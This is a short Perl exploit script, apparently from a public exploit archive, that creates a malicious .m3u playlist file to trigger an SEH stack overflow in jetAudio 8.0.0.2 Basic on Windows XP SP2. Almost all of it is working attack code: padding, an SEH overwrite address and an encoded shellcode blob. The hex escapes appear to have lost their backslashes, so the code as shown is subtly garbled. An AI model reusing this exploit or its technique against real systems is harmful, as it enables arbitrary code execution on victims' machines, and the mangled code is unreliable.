#!/usr/bin/perl
# Title: jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
# Author: cr4wl3r <cr4wl3r[!]linuxmail.org>
# Tested: Windows xp(sp2)
#########################################

my $file="b00m.m3u";

my $header = "http://";
my $junk = "A" x 1017;
my $nseh = "xebx06x90x90";  
my $seh = pack('V',0x01221045); 

my $shellcode = 
"x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13".
"xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC".
"x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0".
"x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9".
"x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E".
"x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49".
"xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B".
"x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8".
"xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6".
"x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15".
"x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78".
"x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB".
"xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51".
"xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8".
"xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF".
"xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF".
"x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F".
"xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB".
"xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56".
"xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9".
"xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F".
"x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA".
"x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8";


my $footer="E" x (2000-length(junk.nseh.seh.shellcode));

my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer;

print " Writing payload to filen";

open(sploitf,">$file");
print sploitf $payload;
close(sploitf);
print " Exploit file " . b00m . " createdn";
print " b00m " . length($payload) . " bytesn";